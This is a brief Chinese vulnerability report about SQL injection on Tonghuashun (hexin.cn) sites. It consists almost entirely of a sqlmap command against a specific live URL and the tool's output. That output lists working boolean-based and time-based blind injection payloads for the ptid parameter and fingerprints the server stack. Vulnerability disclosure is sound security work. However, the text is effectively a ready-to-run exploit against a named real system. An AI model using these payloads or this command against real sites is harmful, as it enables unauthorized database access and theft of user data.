同花顺多个站点SQL注入漏洞

python sqlmap.py -u "http://wapdx.hexin.cn/lhj/dl_pt.php?ptid=765&ptname=java&verid=42&vername=%E9%A2%86%E8%88%AA%E5%AE%B6"

---
 Parameter: ptid (GET)
     Type: boolean-based blind
     Title: AND boolean-based blind - WHERE or HAVING clause
     Payload: ptid=765 AND 3360=3360&ptname=java&verid=42&vername=%E9%A2%86%E8%88%AA%E5%AE%B6
 
     Type: AND/OR time-based blind
     Title: MySQL > 5.0.11 AND time-based blind
     Payload: ptid=765 AND SLEEP(5)&ptname=java&verid=42&vername=%E9%A2%86%E8%88%AA%E5%AE%B6
 ---
 [13:18:13] [INFO] the back-end DBMS is MySQL
 web server operating system: Linux CentOS
 web application technology: Apache 2.2.22, PHP 5.6.10
 back-end DBMS: MySQL 5.0.11